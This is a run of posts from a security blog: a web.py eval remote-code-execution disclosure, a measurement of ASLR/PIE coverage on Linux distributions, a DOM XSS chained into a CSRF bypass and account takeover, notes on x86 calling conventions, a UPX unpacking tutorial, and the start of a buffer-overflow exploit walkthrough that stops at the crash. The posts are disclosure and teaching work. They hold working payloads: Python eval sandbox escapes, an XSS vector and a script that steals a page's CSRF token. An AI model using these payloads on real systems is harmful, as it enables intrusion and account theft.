Remote Code Execution in web.py

Several months ago I happened to be looking at web.py's source code when I found an old-style (as in basic) remote code execution in the database module. Fortunately for most users of web.py, the database module is pretty simple and most installations leverage other external Python modules for DB operations instead. I meant to wait until it was fixed, and then I simply forgot to come back and add an entry about it. A first attempt at fixing the issue was made in April and the final patch was committed in May.

The issue

The db module tries to provide a way for developers to do «ruby style» variable interpolation in SQL queries, which is a cool feature but unfortunately too powerful as implemented. The vulnerable function, «reparam», is the one that performs the interpolation we were talking about. Here's its original code:

def reparam(string_, dictionary):
    """
    Takes a string and a dictionary and interpolates the string
    using values from the dictionary. Returns an `SQLQuery` for the result.

        >>> reparam("s = $s", dict(s=True))
        <sql: "s = 't'">
        >>> reparam("s IN $s", dict(s=[1, 2]))
        <sql: 's IN (1, 2)'>
    """
    dictionary = dictionary.copy() # eval mucks with it
    vals = []
    result = []
    for live, chunk in _interpolate(string_):
        if live:
            v = eval(chunk, dictionary)
            result.append(sqlquote(v))
        else:
            result.append(chunk)
    return SQLQuery.join(result, '')

The docstring is pretty self-explanatory, and so is the vulnerability. The entry points to reparam() are the functions _where(), query(), and gen_clause(). Since none of these functions validates what the user sends as part of the query, remote code execution is possible with a call like the one below, in which the param after /q/ is part of the where clause of a simple query:

$__import__('os').system('pwd')

It’s also possible to test this directly in the interpreter, which is easier:

>>> import web
>>> web.reparam("$__import__('os').getcwd()", {})
<sql: "'/Users/adrian'">
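The dangerous pattern can be reproduced without web.py installed at all. The sketch below (the function name is mine, not web.py's) shows why evaluating a user-controlled chunk is game over:

```python
import os

# Minimal reproduction of the vulnerable pattern; this is NOT web.py's actual code,
# just the essence of what reparam() did with each "$..." chunk.
def vulnerable_interpolate(chunk, dictionary):
    return eval(chunk, dictionary)

# A benign use, followed by the exact same call an attacker would force:
assert vulnerable_interpolate("s", {"s": True}) is True
assert vulnerable_interpolate("__import__('os').getcwd()", {}) == os.getcwd()
```

The second assertion succeeds because eval() helpfully injects the built-ins into an empty globals dict, so `__import__` is always in reach.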

A first attempt at fixing it

After I emailed the developers describing the issue, they committed a new version in a handful of days. I have to say that I received a reply to my email the same day, acknowledging the issue and thanking me for bringing it up; my deepest respect to web.py's developers.

Their original approach was to remove Python's built-ins from eval(). This removes things like «__import__» from the scope of the function, which you'd need in order to load the 'os' module. It strips the scope to the bare bones, in theory preventing any attempt at running code. This is what happens when you try the above exploit against the new version:

>>> import web
>>> web.reparam("$__import__('os').getcwd()", {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "web/", line 305, in reparam
    v = eval(chunk, dictionary)
  File "<string>", line 1, in <module>
NameError: name '__import__' is not defined

No surprises there. However, securing eval is not an easy task. In fact, I'm not completely sure whether it is possible to eval user input in a completely safe fashion. Even if you remove all the built-ins, due to Python's idiosyncrasies it is possible to get them back. A long time ago I read this really nice article that has been useful many times when dealing with Python. Based on that, this is the PoC I sent back:

>>> web.reparam("${(lambda getthem=([x for x in ().__class__.__base__.__subclasses__() if x.__name__=='catch_warnings'][0]()._module.__builtins__):getthem['__import__']('os').getcwd())()}",{})
<sql: "'/Users/adrian/Desktop/webpy/webpy'">

And we're back in business. Wait, OK, but what's happening there? Well, it is simple: essentially I'm traversing the subclasses of «tuple»'s base class (object) until I locate one called «catch_warnings».

().__class__.__base__.__subclasses__() # takes tuple, goes to the parent class, and then traverses the subclasses

Why this one in particular? Just because it happens to have the original built-ins in scope, which we then use to retrieve «__import__» and access the «os» module again. Nice, huh?
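Unrolled, the one-liner does roughly the following. This is a sketch: the exact attribute layout (`_module` in particular) is a CPython implementation detail, and in a real attack the warnings module is already loaded by the interpreter, so the import below is only there to make the demo deterministic:

```python
import warnings  # normally already loaded; imported here only so the demo is deterministic

# Walk from a harmless literal up to object, then down to every loaded subclass.
subclasses = ().__class__.__base__.__subclasses__()

# catch_warnings instances keep a reference to the warnings module...
cw = [c for c in subclasses if c.__name__ == 'catch_warnings'][0]
module = cw()._module  # CPython detail: the 'warnings' module object

# ...whose __builtins__ hands the original built-ins back
# (a dict in imported modules, a module object in __main__).
builtins_ns = module.__builtins__
builtins_ns = builtins_ns if isinstance(builtins_ns, dict) else vars(builtins_ns)
os_module = builtins_ns['__import__']('os')
```

At this point `os_module.system(...)` is available again, builtins stripped or not.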

The final fix

In the end, web.py's developers decided to implement a safer solution, albeit with limited functionality. If I remember correctly, the old behaviour can still be enabled if desired, but the default is the safer approach. The solution makes use of the ast module to create a custom parser and evaluator, calling safe_eval() instead of eval(). As far as I can tell, this solves the vulnerability.
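The actual fix is more elaborate, but the core idea can be sketched with the ast module: parse the chunk and only honour bare names and literals, refusing calls, attribute access and everything else. A minimal sketch (mine, not web.py's code):

```python
import ast

def safe_lookup(expr, namespace):
    """Evaluate a '$...' chunk allowing only bare names and literals.
    Illustrative sketch of the AST approach, not web.py's implementation."""
    node = ast.parse(expr, mode='eval').body
    if isinstance(node, ast.Name):
        return namespace[node.id]
    # literal_eval raises ValueError on calls, attribute access, etc.
    return ast.literal_eval(node)
```

With this, `safe_lookup("s", {"s": True})` still works, while the earlier `__import__('os')` payloads die with a ValueError at parse-evaluation time instead of executing.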

To sum up, if you have an old version of web.py running and you're using the built-in database module, you should be upgrading right now.

Take care.

Posted in hacking, Programming, web hacking

How Effective is ASLR on Linux Systems?

Address Space Layout Randomization (ASLR) is an exploit mitigation technique implemented in the majority of modern operating systems. In a nutshell, the idea behind ASLR is randomizing the process' memory space in order to prevent the attacker from finding the addresses of functions or gadgets (s)he might require to successfully complete the exploit. An in-depth explanation of ASLR is beyond the scope of this brief blog post; if you feel like reading more about ASLR, I suggest you start with these (I, II).

The Good

Linux introduced ASLR with kernel 2.6.12 back in 2005, followed by Microsoft, who did the same with Vista in 2007. While Linux's ASLR is applied to every executable, Microsoft's implementation requires the binary to be linked with ASLR support. The randomization affects both shared libraries and executables in order to provide a fully randomized process address space. As of 2013, one would like to think that this mechanism is both mature and widely adopted, thus increasing the overall security of our operating systems (am I being too naive?).

Linux ASLR can be configured through /proc/sys/kernel/randomize_va_space. The following values are supported:

  • 0 – No randomization. Everything is static.
  • 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized.
  • 2 – Full randomization. In addition to elements listed in the previous point, memory managed through brk() is also randomized.
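Checking which mode is active boils down to reading that sysctl. A small sketch (the value-to-description mapping mirrors the list above):

```python
# Interpret /proc/sys/kernel/randomize_va_space (Linux only)
ASLR_LEVELS = {
    0: "No randomization",
    1: "Conservative randomization",
    2: "Full randomization",
}

def aslr_level():
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except OSError:
        return None  # not a Linux system, or /proc not mounted
```

The same value can be written back (as root) to change the mode, e.g. `echo 2 > /proc/sys/kernel/randomize_va_space`.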

I don't mean to dive into the math involved in ASLR, but a quick word is hopefully not uncalled for. The effectiveness of ASLR is limited by the amount of entropy available. Theoretically, a 32-bit system provides less entropy for ASLR than a 64-bit one. However, other constraints also limit the entropy, such as those related to memory layout. For example, in order to allow the stack to keep growing from higher memory down towards the heap, the most significant bits are usually not randomized. In some scenarios this limits the entropy of mmap() on a 32-bit system to only 16 bits. The PaX patch is available to increase this amount to 24 bits.

The Bad

Leaving the math aside, it's obvious that for ASLR to be effective, all segments of a process' memory space must be randomized. A single non-randomized area completely defeats the purpose of ASLR, because the attacker can use that area to locate valuable gadgets and build a successful exploit. This has been a recurring problem with Windows implementations: since third-party software (and often Windows' own software) contained DLLs not participating in ASLR, it was easy to build exploits leveraging those libraries. Linux kernels prior to 2.6.22 had a similar problem, where the VDSO (virtual dynamic shared object) was always located at a fixed address.

On the other hand, current Linux has its own set of problems. In spite of ASLR being applied to every process, not every memory area is randomized for all executables. The code segment (or text segment; .text) of the main binary is located at random addresses only if the executable has been compiled as a Position Independent Executable (PIE). A position independent executable is compiled in such a way that it can be located anywhere in memory and still execute properly without modification. This is achieved through the use of PC-relative addresses instead of absolute addresses. All shared objects (.so, libraries) are compiled as PIE, as it's mandatory for them to work, thus they're always at random memory addresses when ASLR is enabled.

Based on the above, we can assume that Linux executables not compiled as PIE are not effectively protected by ASLR, even with randomization set to 2 (Full Randomization). The attacker can leverage the .text segment, and other areas located within the main executable such as the GOT/PLT, to build a successful exploit against a non-PIE executable on a system with ASLR enabled. As a result, any non-PIE executable leaves the door open to ret2plt, GOT-dereferencing and ROP attacks.
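One quick way to tell whether a binary was built as PIE is the ELF header's e_type field: a fixed-address executable is ET_EXEC, while a PIE is ET_DYN (the same type shared objects use). A minimal sketch of that check, operating on raw header bytes and assuming a little-endian e_ident[EI_DATA]:

```python
import struct

ET_EXEC, ET_DYN = 2, 3

def elf_is_pie(header: bytes) -> bool:
    """True if e_type is ET_DYN (position independent).
    Assumes a little-endian ELF; sketch, not a full parser."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # e_type is the 2-byte field right after the 16-byte e_ident
    (e_type,) = struct.unpack_from("<H", header, 16)
    return e_type == ET_DYN

# Crafted headers for illustration; only the magic and e_type matter here:
pie_hdr    = b"\x7fELF" + b"\x00" * 12 + struct.pack("<H", ET_DYN)
no_pie_hdr = b"\x7fELF" + b"\x00" * 12 + struct.pack("<H", ET_EXEC)
```

`readelf -h` shows the same field as "Type:"; note that ET_DYN alone does not distinguish a PIE executable from a plain .so.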

The following code demonstrates that the main executable is not randomized, despite ASLR being enabled, unless it's compiled as PIE.

#include <stdio.h>

void* getEIP () {
    /* the call to getEIP is 5 bytes; subtracting it points at the call site in .text */
    return __builtin_return_address(0) - 0x5;
}

int main(int argc, char** argv) {
    printf("EIP located at: %p\n", getEIP());
    return 0;
}
Execution of the above code as a non-PIE binary is displayed in the image below.

.text not randomized on Non-PIE executable

As can be seen, the libraries are located at random addresses each time, while the .text section remains static. When compiled as a PIE, the following image shows that the address of the .text section is also randomized, and therefore unguessable for the attacker.

.text is random in PIE executables

The Ugly

So far so good: non-PIE executables do not benefit from ASLR protection. So what? Surely Linux binaries are compiled as PIE to make the most of the available exploit mitigations... or are they? According to some studies, the Linux flavours most used as web servers are CentOS, Ubuntu Server and Debian (although I guess Red Hat Enterprise has a nice share as well). Based on that, I've compiled some statistics about the number of PIEs present in those Linux distributions. The systems studied are:

  • Ubuntu Server 12.10 x86_64 + apache2 + mysql + php5 +sshd
  • Debian 6 x86_64 + web server + mysql + php5 + sshd
  • CentOS 6.3 x86_64 + apache2 + mysql + php5 + sshd

All of them were installed with the standard options. The following results were compiled using Checksec, a nicely done script that checks for the presence of common security mechanisms such as ASLR, NX, canaries, RELRO, etc. You can obtain Checksec here. These are the numbers:

Distro         Num Binaries   PIE Enabled     Not PIE
Ubuntu 12.10   646            111 (17.18%)    535
Debian 6       592            61 (10.30%)     531
CentOS 6.3     1340           217 (16.19%)    1123

Surprisingly enough, PIE is not widely embraced by the above Linux versions. However, network daemons are usually compiled as PIE, alleviating the problem and reducing the attack surface. Whether the reason not to enable PIE is performance (PIE binaries require an extra indirection) or something else, the security benefits greatly outweigh the cost. Quick and dirty math shows that between 82.82% and 89.7% of the binaries on these Linux systems are not effectively protected by ASLR.
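The percentages in the table and the 82.82%–89.7% range follow directly from the raw counts:

```python
stats = {  # distro: (total binaries, PIE enabled) -- numbers from the table above
    "Ubuntu 12.10": (646, 111),
    "Debian 6":     (592, 61),
    "CentOS 6.3":   (1340, 217),
}
for distro, (total, pie) in stats.items():
    pie_pct = 100 * pie / total
    print(f"{distro}: {pie_pct:.2f}% PIE, {100 - pie_pct:.2f}% not PIE")
```

Ubuntu lands at 82.82% non-PIE and Debian at 89.70%, the two extremes quoted above.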

In the same way, other protections such as stack canaries and RELRO were taken into account during this exercise, and the results are both uneven and shocking. However, in order to obtain a truthful vision of the state of those security mechanisms, further work is required. For example, GCC only includes stack canaries in functions that match specific criteria; in other words, functions that GCC considers a likely target for buffer overflows. As a result, the lack of canaries in some binaries does not necessarily mean the executable is missing a mitigation; it may simply not need one at all.

Well, so much for a Sunday evening. Any questions or corrections, use the comments!

Take care.

Posted in exploiting, hacking, Linux

XSS killed the anti-CSRF star

This entry hopes to be a quick consideration of how one attack vector can at times dismantle the security of a different area of the application that was otherwise deemed secure. Truth is, security threats many times work like this: one thing builds upon another until, in the end, the attacker is able to score. In this case, I'll show a real-life example of how a DOM XSS flaw can be the only leverage an attacker needs to bypass a random-token-based CSRF protection. As a cherry on top, we'll see that this effectively led to account theft.

Many a time developers don't fully understand that a «small» flaw can compromise the whole application if used with wit. In this case, it wasn't even necessary to string many flaws together; one used in the right spot sufficed to compromise the application.

The story goes as follows. We have a rather secure web application, with no major session management issues, and a settings page that looked something like this.

CSRF protected settings page

As shown in the image above, the application's settings page contains an anti-CSRF token that is random per request; therefore it's not vulnerable to CSRF attacks, or is it? The only flaw this application had was a DOM XSS present in every page (settings included) that was considered «not critical» by the developers. But as is well understood by web pentesters, XSS flaws enable attackers to bypass CSRF token protections. The simple idea beneath it is that the attacker can use the injected script to read the DOM, obtain the CSRF token and use it to make the right request to the server. Let's take a closer look at this DOM XSS.

For every section of the application, a message indicates where within the application the user is. This has been implemented using a small JavaScript snippet that takes the URL and prints it on the screen. The code used was like this:

function printArea(){
    var x = document.getElementById("area");
    var u = window.location.href.toString();
    var area = u.substring(u.lastIndexOf("//") + 2);
    x.innerHTML = "You are in " + area + "<br />";
}
The vulnerability is obvious, since there's no encoding of the URL (window.location.href) and it can be manipulated by an attacker. A simple payload like #<img src=1 onerror=alert(42)> appended to the URL triggers the flaw, as can be seen in the screenshot below.
Triggering the DOM XSS

Nothing surprising here. Pretty easy, straightforward DOM XSS. How can the attacker use this to launch a CSRF attack, then? Simple: the attacker adds to the URL JavaScript code that reads the CSRF token from the DOM, builds a POST request (the site doesn't work with GET) and sends it. The server would have no way to tell the legitimate user's request from this one. To get the token, the following line can be used:


Reading the anti CSRF token

All the attacker needs to do now is put together a small piece of code to use that token to submit a request. The following code worked for the above vulnerability:

var token = document.getElementsByName('csrf_token')[0].value; // grab the anti-CSRF token from the DOM
var http = new XMLHttpRequest();
var params = 'address=123 Fake Street&csrf_token=' + token + '&submit='; // field names are illustrative
http.open('POST', '/settings', false); // hypothetical settings endpoint
http.setRequestHeader('Connection', 'close');
http.send(params);
That script (which can be simplified), URL-encoded, can be used to attack a legitimate user and force him into submitting the form, thus changing the email/address/phone to one of the attacker's choosing. Nothing too exciting, though, until you put all the pieces together. The developer classified this as low risk, since in his opinion editing those settings won't take the attacker anywhere. However, he failed to see that the expected behaviour of his application would allow the attacker to access other people's accounts. How so? Easy: the application has a «Reset Password» functionality, with no vulnerabilities at all, that looked like this.
Email the user a new password

If the user cannot remember his password, all he has to do is enter his username in the text field (and solve the captcha), and an email with a new temporary password will be sent to the address specified on his settings page. The attack vector should be crystal clear now:

  1. Attacker lures the victim into clicking a link with the above XSS payload in the URL
    1. The payload submits a request to the settings page bypassing the CSRF protection, changing the account email to the attacker's
  2. If need be, the payload is tailored to also send the username to the attacker (i.e. making a GET request to his evil server)
  3. The attacker visits the «Reset Password» page and introduces the victim's username.
  4. The attacker receives a new password for the victim's account, effectively stealing it.

If the settings page had used another anti-CSRF technique, like CAPTCHAs or asking the user to re-enter credentials, the attack would still have been possible, although a little bit trickier.

This is nothing new or technically complex, but I felt like pointing it out since I find that many people fail to connect the dots to achieve their goals with the vulnerabilities they find. At the same time, many developers aren't aware that an XSS can turn into a session management issue.

Posted in web hacking

Calling Conventions Hunting

When trying to understand a binary, it's key to be able to identify functions and, with them, their parameters and local variables. This helps the reverser figure out APIs, data structures, etc.; in short, gain a deep understanding of the software. When dealing with functions, it's essential to identify the calling convention in use, as that will often allow the reverser to make educated guesses about the arguments and local variables used by the function. I'll try to describe a couple of points that may aid in identifying the calling convention of any given function and the number and ordering of its parameters.

Calling Conventions

A calling convention defines how functions are called in a program. They influence how data (arguments/variables) is laid on the stack when the function call takes place. A comprehensive definition of calling conventions is beyond the scope of this blog, nonetheless the most common ones are briefly described below.

cdecl
Description: Standard C/C++ calling convention. Allows functions to receive a dynamic number of parameters.

Cleans the stack: The caller is responsible for restoring the stack after making a function call.

Arguments passed: On the stack, from right to left: the last argument is pushed first, so the first argument sits on top of the stack when the call takes place.

void _cdecl fun();

fastcall
Description: Slightly better performance calling convention.

Cleans the stack: The callee is responsible for restoring the stack before returning.

Arguments passed: First two arguments are passed in registers (ECX and EDX). The rest are passed through the stack.

void __fastcall fun();

stdcall
Description: Very common in Windows (used by most APIs).

Cleans the stack: The callee is responsible for cleaning up the stack before returning. Usually by means of a RETN #N instruction.

Arguments passed: On the stack, from right to left (the same order as cdecl); the difference is that the callee pops them when returning.

void __stdcall fun();

thiscall
Description: Used when a C++ method with a static number of parameters is called. Specifically designed to improve the performance of OO languages (VC++ reserves ECX for the this pointer; GCC pushes the this pointer onto the stack last). When a dynamic number of parameters is required, compilers usually fall back to cdecl and pass the this pointer as the first parameter on the stack.

Cleans the stack: In GCC, caller cleans the stack. In Microsoft VC++ the callee is responsible for cleaning up.

Arguments passed: From right to left (as cdecl), so the last argument is pushed first. The this pointer goes in ECX (VC++) or is pushed last onto the stack (GCC).

void __thiscall fun();

Let the small table below serve as a quick reminder.

Quick calling convention reference

Figuring it out

To determine the calling convention of a given function, we have to look at its prologue and epilogue. They'll provide information to narrow down the options and will help us discover the number and ordering of the function's parameters. The first thing is to find out who builds up and tears down the stack.

If the caller is responsible for cleaning up the stack, we're more than likely looking at a cdecl function. Certainly, it could also be a GCC thiscall, in which case there would be one extra argument (the this pointer) pushed onto the stack. The latter is less common, and to tell them apart we'll need to spot that pointer. In other words, if the function takes one or more parameters (usually referenced as ebp+X, with X>=8) and ends with a simple RET with no operands, the calling convention is most likely cdecl. See the example below:

mov eax, dword ptr [ebp+8]    ; first argument
mov ecx, dword ptr [ebp+0Ch]  ; second argument
mov eax, 1                    ; return value in eax
ret                           ; no operand: the caller cleans the stack

If the callee is responsible for tearing down the stack, there are more options to start with: VC++ thiscall, stdcall and fastcall. It gets complicated for functions with 0 or 1 parameters. However, a function with just one parameter may not require that we completely identify the calling convention, as there's no doubt about the parameter ordering. The following tips will help identify the convention in the rest of the cases.

If a valid pointer is loaded into ECX before calling a function, and the parameters are pushed onto the stack without using EDX, we’re looking at a VC++ thiscall. See example ASM below.

push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [ebp+0Ch]
pop ebp
retn 8

If both ECX and EDX are used within the function without being initialized (meaning they are used as parameters and were loaded with valid data by the caller), we’re looking at a fastcall. See example ASM below

push ebp
mov ebp, esp
mov eax, dword ptr [ecx+0Ch]  ; ECX used without being initialized: first register argument
mov ebx, dword ptr [edx]      ; EDX likewise: second register argument
add eax, ebx
mov ebx, dword ptr [ebp+8]    ; remaining arguments come from the stack
pop ebp
retn 4

If all arguments are on the stack and the ending ret instruction has an operand whose value is at least four times the number of parameters the function references, we're looking at a stdcall. If the value is less than four times that number, we might be talking about a fastcall with three or more arguments (the first two travelled in ECX and EDX). See the example ASM below.

push ebp
mov ebp, esp
mov eax, dword ptr [ebp+8]
mov ecx, dword ptr [ebp+0Ch]
mov eax, 1          ; return value in eax
pop ebp
ret 8               ; callee pops 8 bytes (two arguments)


For those calling conventions where the callee is responsible for restoring the stack before returning, the argument passed to the ret instruction is very helpful to guess the number of arguments the function receives. Without any further observation, a simple instruction like the one below offers a lot of information.

retn 8

We can make an educated guess based on that retn. First, we know it is not cdecl, since the function unwinds the stack instead of leaving that task to the caller. We also know that the function takes at least 2 arguments, since it unwinds 8 bytes from the stack, and up to 4 (if the calling convention were fastcall, the first two would be in ECX and EDX). All this, of course, assuming 32-bit parameters and a 32-bit architecture.
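That reasoning condenses into a tiny helper (a sketch assuming a 32-bit architecture with 4-byte arguments):

```python
def arg_count_bounds(retn_operand, word_size=4):
    """Given the operand of a callee-side 'retn N', return (min, max)
    plausible argument counts. Minimum: stdcall/thiscall with N/4 stack
    arguments. Maximum: fastcall, which adds two register arguments
    (ECX and EDX) on top of the stack ones. Sketch, 32-bit assumptions."""
    stack_args = retn_operand // word_size
    return stack_args, stack_args + 2

# retn 8 -> at least 2 arguments (stdcall), up to 4 (fastcall)
```

For `retn 8` this yields (2, 4), matching the deduction above.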


In order to decipher undocumented APIs, it's key to identify the calling convention in use. It's obvious at this point that a different calling convention would change the signature of a function from fun(p1,p2,p3) to fun(p3,p2,p1), hence the need to identify it clearly. I hope it's more than evident that figuring out the calling convention, as well as the number of parameters a function takes, is the first step towards understanding its inner workings.

As always, if there’s anything to add, ask or correct, don’t hesitate to comment!

Take care!

Posted in Programming, Reverse

SANS HolidayHack Write Up

During this Christmas break, although I went back to Spain to stay with family and friends, I was still able to find some time to look at the SANS HolidayHack 2012 CTF. I must say it has been great fun; the story was very creative, with the Miser brothers and Santa and all. I got stuck at some of the levels but was finally able to solve them all. I didn't really want to steal much more time from family, so my write-up might be a little rough. Nonetheless, I'm uploading it now that the CTF has finished; for those interested, it can be found here.

Miser brothers

Prizes haven't been awarded yet: one goes to the best technical answer, one to the most original answer and one is randomly assigned among the participants. Let's see if I get lucky.

Posted in CTF, hacking, wargame

A very light introduction to packers

It's been a long time since I first thought of writing some posts about packers/crypters/protectors. I'm not sure how many I'll write; it will probably depend on the interest of the audience. What I do know is that I'll try to follow the blog's philosophy, so we'll go bottom-up, explaining the basic concepts or pointing to the best references when I deem it appropriate.

Packers, Crypters, Protectors

The first time one looks into this topic, one comes across these different names for what at first glance seems to be pretty much the same thing. The terms are nowadays somewhat mixed, but I think the following definitions won't harm and might shed some light for the inexperienced:

  • A Packer‘s main goal is to reduce the executable size using compression algorithms. (e.g. UPX)
  • A Crypter‘s main goal is to encrypt the executable, hindering the disassembly process. (e.g. EasyCrypter)
  • A Protector‘s main goal is to make more difficult the task of debugging an executable using anti debugging techniques. (e.g. Yoda’s Protector)
  • A Hybrid combines two or more of the above characteristics (e.g. Crypter)

The categorization problem should be obvious now, since many existing tools combine more than one of the above attributes. The confusion as to why some people consider a pure packer a protection against reverse engineering may come from the fact that all of the above tools modify the Original Entry Point (OEP) of the executable and modify the Import Address Table (IAT), either compressing, encrypting or protecting it. To better understand why this is a bother when reversing, it's key to realize that one of the first steps in the reverse engineering process of a program is to locate the OEP as well as function calls and common API references. Since these tools compress or encrypt the executable code and the IAT, the reverse engineer cannot locate those APIs until the unpacking has taken place.


It should suffice to say that knowledge is always valuable, but for those of you wondering about the practicality of learning how to unpack a packed binary or how to create your own simple packer/crypter, I'll make a case. From a penetration tester's perspective, knowing how to create your own packer/crypter may come in handy in situations where you need to bypass antivirus software in order to achieve code execution on your target. This has always been one of the main goals of crypters, and they're heavily used by malware. From a reverse engineer's or binary auditor's perspective, you'll come across many samples that are in fact packed. For the most common cases, there are automated tools that will unpack the binary for you. Nevertheless, for new or unknown packers you'll be on your own, and manually unpacking them will be the only way to go. If you're a developer, you may want to know more about protectors/crypters in order to prevent unwanted eyes from prying into your application; many commercial applications make use of these kinds of tools to keep the crackers at bay.

Introductory Example (Unpacking UPX)

Before giving a brief overview of the theoretical concepts, I think I should show a manual (sort of) unpacking of the very well known UPX packer. The program we're using for this example is Windows' notepad.exe. First, we've downloaded UPX (from here), and we've packed notepad.exe:

C:\Documents and Settings\adrian\Desktop\Unpacking\UPX\upx308w>upx.exe -o ..\notepad_UPX.exe ..\notepad.exe

That should have produced a file called notepad_UPX.exe, which we'll use for the demonstration. It might be worth our while to stop now and try to identify any obvious differences between the original and the packed binaries.

Size difference is evident

Looks like UPX did a good job: it reduced the notepad.exe size from 69K to 48K by means of compression. Now let's look at some PE tools to spot other differences. First we'll run RDG Packer Detector (download here) on both binaries; the results are below:


Info on original notepad.exe

Info on packed notepad.exe

As we can see, RDG says that the original notepad.exe was developed with Microsoft Visual C++ 7.0 and that the packed version has been packed with UPX. This was the expected result, since UPX is a very well known packer and has been around for a long time. Another thing we can observe is the section table; we'll use PEiD for that (download here).

Sections of original notepad.exe

OK, so we have three sections (.text, .data, .rsrc) and everything looks normal. Besides that, we can see the entry point located at offset 0x73d9.

Sections of packed notepad.exe

Those are some differences. We still have three sections, but the names have changed from .text and .data to UPX0 and UPX1. That's not putting much effort into concealing the packer, not that concealment was UPX's goal anyway. The Entry Point has changed as well; it now points to the start of the unpacking routine (within UPX1). It's also interesting that the Raw Size of UPX0 is exactly 0 bytes; isn't that weird? It causes two sections to have the same Raw Offset (0x400). These kinds of things are a strong indicator that the executable has been through some kind of manipulation.
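Those observations translate into simple heuristics. A hedged sketch (the list of «common» section names and the checks are illustrative, not a real detector like RDG or PEiD):

```python
def looks_packed(sections):
    """sections: list of (name, raw_size) tuples, as shown by PEiD.
    Flags zero-raw-size sections and nonstandard names.
    Crude, illustrative heuristics only; real detectors use signatures."""
    common = {".text", ".data", ".rsrc", ".rdata", ".reloc", ".bss", ".idata"}
    return any(raw_size == 0 or name not in common
               for name, raw_size in sections)
```

The packed notepad from above would trip both checks: `looks_packed([("UPX0", 0), ("UPX1", 0x9000), (".rsrc", 0x2000)])` returns True, while the original's section table does not.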

So now, let's try to unpack the notepad.exe file that we packed with UPX before. First we open the executable in Immunity Debugger, to be greeted by a common sign of packed executables.

This binary has been packed!

OK, so now EIP should be sitting on the first instruction of our program, which, as we know now, is the first instruction of the unpacking routine. Many packers, including UPX, start by saving the processor state (registers) with a PUSHAD instruction. This is what that looks like:

Process just loaded into Debugger

We're gonna do some cheating for the sake of the explanation here. We'll take a look at the OEP within the debugger right now, right after loading the executable. After the unpacking takes place, we know (for we have the original file to compare) that execution will jump to 0x0100739D (the OEP). But before the unpacking takes place, this is what lies at that address:

Contents of OEP before unpacking

That's certainly not good code; more like a bunch of zeroes. Now for the little trick for plain UPX. Since the packer starts by saving the registers, as we saw above, we can expect those registers to be restored right before execution of the original notepad code starts. Thus, we'll set a breakpoint on the saved values to figure out when they are restored. Remember that our goal is to find the OEP. We'll do as follows:

  1. Single step over the PUSHAD instruction (hit F7)
  2. Right click on ESP and click «Follow in Dump». You should be seeing the values of the registers in the dump window right now.

    Registers saved

  3. Select the values of one of the saved registers in the dump window and set a hardware breakpoint on access.
  4. Resume execution (hit F9).

If we’re lucky, we should stop at the breakpoint we set in the previous step. A few instructions past the point where execution stopped there should be a JMP that will lead us to (surprise, surprise) the unpacked code of notepad.exe, and thus the OEP.

JMP to OEP is right there

Single step from that JMP just once and you’ll land on the OEP at 0x0100739D (as we already knew). Don’t keep stepping for now. We’ll make use of OllyDumpEx (download here), a plugin for both Immunity Debugger and OllyDbg that dumps the process to disk. Now that the process is unpacked in memory, we can dump it to disk, creating an unpacked executable. That executable won’t run just like that; we’ll need to do a little bit of work on it, but for now, let’s dump it. The options you have to select in the OllyDumpEx window are shown below.

Dump Options

Click on Dump and save it with the name of your choice (in my case notepad_UPX_dump.exe). At this point, if we try to run the dumped binary it will display an error message; in other words, it won’t run. As disappointing as that might be, there’s a rational explanation: the IAT needs to be repaired. We’ll talk about the IAT and how to repair it manually in future posts. For now, suffice it to say that our dumped binary has no clue where to obtain the addresses of the API functions it needs to execute properly. Often there’s no need to repair the IAT manually, and we can rely on the ImpREC tool (download here) to do it for us. What we’ll do now to fix the IAT is:

  1. Run the packed version of notepad (notepad_UPX.exe) and leave it there.
  2. Run ImpREC.
  3. In the dropdown menu, locate your notepad_UPX.exe process.
  4. Then modify the OEP box at the bottom to point to the OEP we’ve previously found, without the base address (i.e. just the offset). In this case 0000739D.
  5. Click on «Get Imports»
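Step 4 asks for the OEP as an RVA, i.e. the virtual address minus the image base. The arithmetic is trivial (0x01000000 is notepad.exe’s preferred image base on XP):

```python
image_base = 0x01000000  # notepad.exe's preferred image base on XP
oep_va     = 0x0100739D  # OEP we found in the debugger

# ImpREC's OEP box wants the relative virtual address (offset from base)
oep_rva = oep_va - image_base
hex(oep_rva)  # → '0x739d'
```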

The ImpREC window should look like the picture below.

Import Reconstructor found IAT for notepad_UPX.exe

Now click «Fix Dump», select the previously dumped file (notepad_UPX_dump.exe) and click OK. That’s it, ImpREC should have fixed the IAT of our process and created a new file called «notepad_UPX_dump_.exe» (note the trailing underscore). You can try running it now; if you followed all the steps, the notepad window should open as expected. Finally we have an unpacked version of notepad that we can reverse engineer at will.

We’ve seen a little bit about packers and we’ve shown a quick and very easy example of how to unpack UPX to whet the appetite. There’s a lot more to do with this, and many more topics to cover as it gets more challenging and interesting at once. Hopefully we’ll cover more of that in subsequent entries. Till then, if you have any questions, please leave a comment. Take care!

Posted in cracking, Reverse

FormatFactory 3.01 Stack Based Buffer Overflow (SafeSEH bypass)

Last week I saw this vulnerability disclosed on PacketStorm and decided to create my own exploit; yeah, boredom is a powerful motivation. The originally published exploit wouldn’t work on my system, maybe because it was designed for the German language version. I thought it might be a good idea to explain the process, since this exploit is simple enough.


Software: Format Factory v3.01 Stack Based Buffer Overflow

System: Windows XP SP3 Pro Spanish

Bypasses: SafeSEH


Format Factory is a multifunctional media converter for Windows. It’s free and offers a wide range of functionality. The application creates .ini files to store the user preferences for each type of conversion (e.g. if you decide your TIFF files will have a max width of 320, it stores that info in a .ini file). Those files are created under %USERPROFILE%/My Documents/FormatFactory/XXX/, where XXX is the name of a folder specific to the type of media file (PicCustom, AudioCustom…). The following is an example of a .ini file for the TIFF format:


We can start playing with these files; fuzzing the format is not complicated, and I might write another post on how to do it with Sulley later on. The vulnerability is triggered when the application processes long strings as the value of the Type key. From fuzzing (or manually increasing the size of the Type value) we can see that Format Factory starts crashing when the string is 256 ‘A’s long. This is what the registers and stack trace look like when the crash happens:

Program crash with 256 A’s

